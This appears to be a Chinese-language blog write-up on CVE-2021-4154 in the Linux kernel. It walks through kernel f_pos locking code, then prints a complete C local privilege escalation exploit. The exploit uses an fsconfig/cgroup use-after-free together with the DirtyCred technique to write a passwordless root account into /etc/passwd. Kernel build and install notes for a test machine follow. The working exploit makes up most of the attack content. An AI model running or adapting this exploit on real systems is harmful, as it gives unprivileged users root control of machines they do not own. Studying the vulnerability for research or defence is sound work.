如果file_needs_f_pos_lock(file)返回值为true,那么这个线程就会被上锁,但是此时还没过file权限check呢,这显然是我们不想看到的,那该怎么办呢?

1
2
3
4
5
6
7
8
9
10
11
/*
* Look up @fd via __fdget() and, when file_needs_f_pos_lock() says so, take
* the file's f_pos_lock and set FDPUT_POS_UNLOCK in the returned word.
* The return value carries the struct file pointer with flag bits in its
* two low bits (they are masked off with ~3 below).
*/
unsigned long __fdget_pos(unsigned int fd)
{
unsigned long v = __fdget(fd);
struct file *file = (struct file *)(v & ~3);

if (file && file_needs_f_pos_lock(file)) {
v |= FDPUT_POS_UNLOCK;
/* May block here, before the caller has done anything with the file. */
mutex_lock(&file->f_pos_lock);
}
return v;
}

可以看到,只有当file->f_mode带有FMODE_ATOMIC_POS这个标志,并且file_count(file) > 1或者f_op实现了iterate_shared时,这个返回值才为true;反过来说,只要没有FMODE_ATOMIC_POS标志,返回值就一定为false

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
* Try to avoid f_pos locking. We only need it if the
* file is marked for FMODE_ATOMIC_POS, and it can be
* accessed multiple ways.
*
* Always do it for directories, because pidfd_getfd()
* can make a file accessible even if it otherwise would
* not be, and for directories this is a correctness
* issue, not a "POSIX requirement".
*
* Returns true only when FMODE_ATOMIC_POS is set AND either the file has
* more than one reference or its f_op provides iterate_shared.
*/
static inline bool file_needs_f_pos_lock(struct file *file)
{
return (file->f_mode & FMODE_ATOMIC_POS) &&
(file_count(file) > 1 || file->f_op->iterate_shared);
}

what is FMODE_ATOMIC_POS?

源码搜索发现open中也调用到了

1
2
3
4
5
......
/* POSIX.1-2008/SUSv4 Section XSI 2.9.7 */
if (S_ISREG(inode->i_mode) || S_ISDIR(inode->i_mode))
f->f_mode |= FMODE_ATOMIC_POS;
......

S_ISREG和S_ISDIR又为何物?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/* File-type tests: each masks the mode with S_IFMT and compares with one S_IF* value. */
#define S_ISLNK(m)	(((m) & S_IFMT) == S_IFLNK)
#define S_ISREG(m) (((m) & S_IFMT) == S_IFREG)
#define S_ISDIR(m) (((m) & S_IFMT) == S_IFDIR)
#define S_ISCHR(m) (((m) & S_IFMT) == S_IFCHR)
#define S_ISBLK(m) (((m) & S_IFMT) == S_IFBLK)
#define S_ISFIFO(m) (((m) & S_IFMT) == S_IFIFO)
#define S_ISSOCK(m) (((m) & S_IFMT) == S_IFSOCK)
//S_ISLNK(st_mode): is it a symbolic link
//S_ISREG(st_mode): is it a regular file
//S_ISDIR(st_mode): is it a directory
//S_ISCHR(st_mode): is it a character device
//S_ISBLK(st_mode): is it a block device
//S_ISFIFO(st_mode): is it a FIFO
//S_ISSOCK(st_mode): is it a socket

所以只要我们打开的文件不是目录或者常规文件就可以规避掉这个锁

FINAL EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <pthread.h>
#include <stddef.h>
#include <signal.h>
#include <stdint.h>
#include <sys/utsname.h>
#include <syscall.h>
#include <linux/mount.h>
#include <linux/unistd.h>
#include <linux/kcmp.h>
#include <sys/mman.h>
#include <crypt.h>

#define FILE_NUM 1000
#define PAGE_NUM 0x40000

int tmp_fd, uaf_fd, fscontext_fd, victim_fd;
int target_fd[FILE_NUM];
pid_t fork_fd;
pthread_t large_write_thread, passwd_write_thread;
int flag = 0, large_write_flag = 0, passwd_write_flag;
size_t start_addr = 0x114514000;
int ret = 0;

/*
 * err_exit - report a fatal error and terminate the process.
 * @msg: text appended to the coloured "[x] Error at: " prefix
 *
 * Prints the message on stdout, pauses for one second, then exits with
 * EXIT_FAILURE. Does not return.
 */
void err_exit(char *msg)
{
	const unsigned int pause_seconds = 1;

	printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
	sleep(pause_seconds);
	exit(EXIT_FAILURE);
}

/*
 * Open @path write-only, write the NUL-terminated @text to it and close it.
 * Best effort: none of the three calls is checked, matching the callers'
 * original inline sequences.
 */
static void proc_write_string(const char *path, const char *text)
{
	int fd = open(path, O_WRONLY);

	write(fd, text, strlen(text));
	close(fd);
}

/*
 * init_namespace - move the process into new user, mount and network
 * namespaces, then write "deny" to /proc/self/setgroups and single-entry
 * uid/gid maps that map id 0 inside the namespace to the original ids.
 *
 * A failing unshare() is fatal (err_exit); the /proc writes are unchecked.
 */
void init_namespace(void) {
	char line[0x100];
	/* Capture the ids before unsharing; they are written into the maps below. */
	uid_t uid = getuid();
	gid_t gid = getgid();

	puts("[*] init namespace");
	if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
		err_exit("unshare(CLONE_NEWUSER | CLONE_NEWNS)");
	}

	if (unshare(CLONE_NEWNET)) {
		err_exit("unshare(CLONE_NEWNET)");
	}

	snprintf(line, sizeof(line), "deny");
	proc_write_string("/proc/self/setgroups", line);

	snprintf(line, sizeof(line), "0 %d 1", uid);
	proc_write_string("/proc/self/uid_map", line);

	snprintf(line, sizeof(line), "0 %d 1", gid);
	proc_write_string("/proc/self/gid_map", line);
}

/*
 * create_dir - (re)create the scratch directory exp_dir with an empty file
 * "data" inside it, and make the tree world-accessible.
 *
 * The shell commands are run in order through system(); their exit
 * statuses are not inspected.
 */
void create_dir()
{
	static const char *const setup_cmds[] = {
		"rm -rf exp_dir",
		"mkdir exp_dir",
		"touch exp_dir/data",
		"chmod -R 777 exp_dir/",
	};
	size_t idx;

	puts("[*] create exp_dir");
	for (idx = 0; idx < sizeof(setup_cmds) / sizeof(setup_cmds[0]); idx++)
		system(setup_cmds[idx]);
}

/*
* create_uaf - create the symlink exp_dir/uaf, open it, hand the descriptor
* to a "cgroup" filesystem context as its "source" via FSCONFIG_SET_FD, then
* close the context. Results are stored in the globals fscontext_fd and uaf_fd.
*/
void create_uaf()
{
// NOTE(review): each system() call runs its own shell, so the two "cd"
// commands do not change this process's working directory.
system("cd exp_dir");
// Create the symlink exp_dir/uaf with target "data".
system("ln -s data exp_dir/uaf");
system("cd ../");

puts("[*] prepare create uaf");
fscontext_fd = syscall(__NR_fsopen, "cgroup", FSOPEN_CLOEXEC);
if (fscontext_fd < 0)
err_exit("fsopen failed!");

// Open flag is the literal 1 - presumably O_WRONLY on Linux; TODO confirm.
uaf_fd = open("exp_dir/uaf", 1);
if (uaf_fd < 0)
err_exit("open uaf failed!");

// The fsconfig return value is not checked.
syscall(__NR_fsconfig, fscontext_fd, FSCONFIG_SET_FD, "source", NULL, uaf_fd);
close(fscontext_fd);
}


/*
* large_write - thread body: open exp_dir/uaf again, map PAGE_NUM anonymous
* pages one by one starting at start_addr, raise large_write_flag, then issue
* one write() of 0x1000*(PAGE_NUM-1) bytes from start_addr.
*
* NOTE(review): declared to return void * but has no return statement.
*/
void * large_write()
{
// Open flag is the literal 1 - presumably O_WRONLY on Linux; TODO confirm.
tmp_fd = open("exp_dir/uaf", 1);
if (tmp_fd < 0)
err_exit("open tmp failed!");
puts("[*] mmap 1G size data");
for (int i = 0; i < PAGE_NUM; i++)
{
// This local "ret" shadows the global of the same name. The address is
// passed without MAP_FIXED.
// NOTE(review): mmap() reports failure as MAP_FAILED, which the check
// below does not compare against.
void * ret = mmap((void*)start_addr + 0x1000*i , 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
if (!ret)
err_exit("mmap failed!");
}

// Signals passwd_write(), which spins on this flag.
large_write_flag = 1;
// start_addr is a size_t passed where write() expects a pointer.
if (write(tmp_fd, start_addr, 0x1000*(PAGE_NUM-1)) < 0)
err_exit("large write failed!");

puts("[*] large write success!");
close(tmp_fd);
}

/*
* passwd_write - thread body: busy-wait until large_write_flag is set, raise
* passwd_write_flag, then write the passwd-format line held in the local
* buffer through uaf_fd.
*
* NOTE(review): declared to return void * but has no return statement.
*/
void * passwd_write()
{
char passwd[1024] = "shell::0:0:root:/root:/bin/bash\n";
puts("[*] try to overwrite /etc/passwd");
// Spin until large_write() sets the flag; the flag is a plain int.
while (!large_write_flag) {}

// Signals file_struct_spray(), which spins on this flag.
passwd_write_flag = 1;
if (write(uaf_fd, passwd, strlen(passwd)) < 0)
err_exit("overwrite /etc/passwd failed!");

puts("[*] overwrite /etc/passwd success");
}

/*
* file_struct_spray - wait for passwd_write_flag, then open /etc/passwd
* read-only up to FILE_NUM times. After each open, kcmp(KCMP_FILE) compares
* uaf_fd with the new descriptor; on the first match the descriptor is stored
* in victim_fd and the global flag is set. Calls err_exit() if an open fails
* or if no descriptor matched.
*/
void file_struct_spray()
{
// Spin until passwd_write() sets the flag; the flag is a plain int.
while (!passwd_write_flag) {}

puts("[*] start try to hit uaf file struct");
for (int i = 0; i < FILE_NUM; i++)
{
target_fd[i] = open("/etc/passwd", O_RDONLY);
if (target_fd[i] < 0){
printf("failed at %d target file\n", i);
err_exit("failed!");
}

// kcmp returning 0 is treated as "both descriptors refer to the same file".
if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, uaf_fd, target_fd[i]) == 0)
{
victim_fd = target_fd[i];
printf("[*] victim_fd is %d\n", victim_fd);
flag = 1;
// This loop runs i times; every iteration calls close(target_fd[i]).
for (int j = 0; j < i; j++)
close(target_fd[i]);
break;
}
}

if (!flag)
err_exit("failed to find victim_fd");

}

/*
* Entry point: set up the namespaces and scratch directory, run create_uaf(),
* start the two writer threads, run file_struct_spray() on the main thread,
* then leave via pthread_exit() so the worker threads can keep running.
* argc, argv and envp are not used.
*/
int main(int argc, char * argv[], char * envp[])
{

init_namespace();
create_dir();

create_uaf();

// pthread_create() results are not checked.
pthread_create(&large_write_thread, NULL, large_write, NULL);
usleep(1);
pthread_create(&passwd_write_thread, NULL, passwd_write, NULL);

file_struct_spray();

// pthread_exit() does not return, so the "return 0" below is not reached.
pthread_exit(NULL);
return 0;
}

最终在真机中的运行效果

不用泄露地址,真的就像🐍出来一样爽啊

some tricks

虽然笔者在上一篇文章中提了一种比较方便的替换复现环境内核的方法,但是吧,还是会遇到许多问题。

就像笔者这次试了5.4和5.8的五六个generic版本,要么就是patch了CVE,要么就是不能稳定运行(大概十次只能成功一次,而且有时候覆写的data一变就8行了)所以笔者还是回归了最原始的方法,直接本地编译一个替换

先把源码放到/usr/src下,解压

1
2
3
4
cp ~/linux-5.8.tar.gz /usr/src
cd /usr/src
tar -xf ./linux-5.8.tar.gz
cd ./linux-5.8

编译

1
2
make menuconfig	#默认选项,直接退出就行
make all -j8 #时间可能会比较长

编译模块

1
2
make INSTALL_MOD_STRIP=1 modules_install #也可以不加INSTALL_MOD_STRIP=1,但是鼠鼠不能保证启动的时候加载600多MB的initrd不会卡死呦😋
make install

更新grub并重启

1
2
update-grub
reboot

然后就是进入高级模式选择5.8版本的内核启动啦

0xff:写在最后的最后

笔者为了图省事,在最后用了dirtycred完成了提权

但是作为一个21年的CVE,原本的exp其实采用了CROSS-CACHE OVERFLOW这一手法完成利用

主要是铸币笔者实在不是很用的明白CROSS-CACHE OVERFLOW,所以直接逃课了😋

但估计接下来笔者会写个专题专门练练👊👊👊

refer

https://blingblingxuanxuan.github.io/2023/05/19/230518-cve-2021-4154

新一代mount系统调用(1)——接口初探 - 知乎 (zhihu.com)


CVE-2021-4154 Remake
http://example.com/2024/03/28/dirtycred/
作者
korey0sh1
发布于
2024年3月28日
许可协议